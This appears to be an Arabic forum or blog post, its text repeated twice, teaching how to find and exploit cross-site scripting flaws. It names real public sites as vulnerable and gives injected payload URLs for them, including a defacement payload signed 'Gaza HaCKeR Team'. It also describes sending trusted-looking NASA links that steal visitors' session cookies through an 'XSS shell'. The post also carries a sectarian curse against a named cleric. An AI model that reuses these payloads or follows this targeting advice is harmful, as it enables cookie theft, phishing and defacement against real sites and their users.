السلام عليكم اخواني
سبق وان وضحنا عن هذه الثغره وبعض استخداماتها للمبتدئين والمحترفين لكن
اليوم ان شاء الله سنتعمق فيها اكثر لنتعرف على انواعها و طريقه اكتشافها و
اسلوب البحث عنها .
اولا : انواعها
الاصابه الداخليه : وهي اخطر انواعها لانه تسمح لك بزرع الكود الخاص فيك في الصفحه بشكل دائم
بحيث ان اي شخص يدخل ل الصفحه تنفذ عنده هذه الاكواد ,.
الاصابه الخارجيه : هي اقل خطوره من سابقتها
ولكن منتشره بشكل اكبر وخصوصا في المواقع الكبيره ومن خلالها تستطيع زرع
الكود الخاص بك بشكل مؤقت في الروابط او في حقول البحث ..
ثانيا: طرق اكتشافها
الاصابه الداخليه : يسهل اكتشاف هذه الثغره
وذالك من خلال وضع اوامر الاكتشاف في اي مكان يسمح لك بوضع معلومات دائمه
مثل التعليق على المدونه او انشاء موضوع جديد او اي مكان اخر .
* اوامر الاكتشاف موجوده في المرفقت لان المنتدى يحضر بعض الكلمات .
الاصابه الخارجيه : هنا يمكنك وضع اوامرك في اي مكان يسمح لك بإرسال معلومات للصفحه مثلا الروابط او حقول البحث او اي مكان اخر .
بعض المواقع المصابه بهذا النوع :
1-هذا الموقع مصاب في حقل البحث وهو موقع السيستاني لعنه الله (مكتشف الثغره اخونا الغضب )
ادخل هنا
http://www.sistani.org/index.php?p=121643
وضع في خانه البحث اي امر من اوامر اكتشاف الثغره (موجوده في المرفقات )
ولاحظ تجاوب الموقع معك .
2- هذا الموقع مصاب في الرابط وهو موقع ناسا (nasa.gov)
ادخل هنا
ولاحظ في نهايه الرابط هذا الامر :
كود PHP:
"><center><h1>Gaza HaCKeR Team<%2Fh1><%2Fcenter><center><IMG+SRC%3D"http%3A//www.hebergeur-images.fr/images/1132327819.jpg">
وهو كود HTML و جافا سكربت ويمكنك استبداله باي كود تريده لكن يجب عليك تشفيره من هنا :
URL encode
كيف تستفيد من الاصابات الخارجيه :
طبعا مميزه هذا النوع كما قلنا انه منتشر في المواقع الكبيره الموثوق منها
فإن نشرت رابط لاحد هذه المواقع لن يشك فيه احد لان الموقع مشهور .
ناخذ مثال ع موقع ناسا :
هذا رابط كل من يدخل عليه احصل على الكوكيز الخاصه فيه و كثير من المعلومات المهمه :
https://careerlaunch.jpl.nasa.gov/ci...E%3C/script%3E
شو رايك هل هذا الرابط يثير لك الشك في الاغلب لا لانه من موقع مشهور وموثوق فيه .
*هون لغمنا باستخدان شل G.H.T XSS SHELL
ثالثا: طرق البحث عنها
ثغرات XSS مثل اي ثغره اخرى لها الدروك الخاص بها وايضا منتشره بشكل كبير في مواقع الثغرات
انت ادخل لاي موقع متخصص في الثغرات وابحث عن XSS وستجد الكثير من النتائج .
مواقع مصابه للتدريب(كلها مواقع من الدرجه الاولى انتبه ل اسم الموقع ) :
http://www.jevon.org/wiki/search.php...TKL%3C%2Fh1%3E
****
http://www.siliconvalley.com/circare...;%3C/SCRIPT%3E
****
http://www.mcdonalds.com/us/en/food/...;%3C/SCRIPT%3E
****
http://www.police.qld.gov.au/station...archbtn=Search
اخيرا هذه مواقع للبحث عن ثغره XSS :
1- http://www.domxssscanner.com/
2- http://xss-scanner.com/
ايضا يمكنك استخدام برنامج Acunetix Web Vulnerability Scanner للبحث عن الثغره .
سبق وان وضحنا عن هذه الثغره وبعض استخداماتها للمبتدئين والمحترفين لكن اليوم ان شاء الله سنتعمق فيها اكثر لنتعرف على انواعها و طريقه اكتشافها و اسلوب البحث عنها .
اولا : انواعها
الاصابه الداخليه : وهي اخطر انواعها لانه تسمح لك بزرع الكود الخاص فيك في الصفحه بشكل دائم
بحيث ان اي شخص يدخل ل الصفحه تنفذ عنده هذه الاكواد ,.
الاصابه الخارجيه : هي اقل خطوره من سابقتها ولكن منتشره بشكل اكبر وخصوصا في المواقع الكبيره ومن خلالها تستطيع زرع الكود الخاص بك بشكل مؤقت في الروابط او في حقول البحث ..
ثانيا: طرق اكتشافها
الاصابه الداخليه : يسهل اكتشاف هذه الثغره وذالك من خلال وضع اوامر الاكتشاف في اي مكان يسمح لك بوضع معلومات دائمه مثل التعليق على المدونه او انشاء موضوع جديد او اي مكان اخر .
* اوامر الاكتشاف موجوده في المرفقت لان المنتدى يحضر بعض الكلمات .
الاصابه الخارجيه : هنا يمكنك وضع اوامرك في اي مكان يسمح لك بإرسال معلومات للصفحه مثلا الروابط او حقول البحث او اي مكان اخر .
بعض المواقع المصابه بهذا النوع :
1-هذا الموقع مصاب في حقل البحث وهو موقع السيستاني لعنه الله (مكتشف الثغره اخونا الغضب )
ادخل هنا
http://www.sistani.org/index.php?p=121643
وضع في خانه البحث اي امر من اوامر اكتشاف الثغره (موجوده في المرفقات )
ولاحظ تجاوب الموقع معك .
2- هذا الموقع مصاب في الرابط وهو موقع ناسا (nasa.gov)
ادخل هنا
ولاحظ في نهايه الرابط هذا الامر :
كود PHP:
"><center><h1>Gaza HaCKeR Team<%2Fh1><%2Fcenter><center><IMG+SRC%3D"http%3A//www.hebergeur-images.fr/images/1132327819.jpg">
وهو كود HTML و جافا سكربت ويمكنك استبداله باي كود تريده لكن يجب عليك تشفيره من هنا :
URL encode
كيف تستفيد من الاصابات الخارجيه :
طبعا مميزه هذا النوع كما قلنا انه منتشر في المواقع الكبيره الموثوق منها فإن نشرت رابط لاحد هذه المواقع لن يشك فيه احد لان الموقع مشهور .
ناخذ مثال ع موقع ناسا :
هذا رابط كل من يدخل عليه احصل على الكوكيز الخاصه فيه و كثير من المعلومات المهمه :
https://careerlaunch.jpl.nasa.gov/ci...E%3C/script%3E
شو رايك هل هذا الرابط يثير لك الشك في الاغلب لا لانه من موقع مشهور وموثوق فيه .
*هون لغمنا باستخدان شل G.H.T XSS SHELL
ثالثا: طرق البحث عنها
ثغرات XSS مثل اي ثغره اخرى لها الدروك الخاص بها وايضا منتشره بشكل كبير في مواقع الثغرات
انت ادخل لاي موقع متخصص في الثغرات وابحث عن XSS وستجد الكثير من النتائج .
مواقع مصابه للتدريب(كلها مواقع من الدرجه الاولى انتبه ل اسم الموقع ) :
http://www.jevon.org/wiki/search.php...TKL%3C%2Fh1%3E
****
http://www.siliconvalley.com/circare...;%3C/SCRIPT%3E
****
http://www.mcdonalds.com/us/en/food/...;%3C/SCRIPT%3E
****
http://www.police.qld.gov.au/station...archbtn=Search
اخيرا هذه مواقع للبحث عن ثغره XSS :
1- http://www.domxssscanner.com/
2- http://xss-scanner.com/
ايضا يمكنك استخدام برنامج Acunetix Web Vulnerability Scanner للبحث عن الثغره .
0 التعليقات:
إرسال تعليق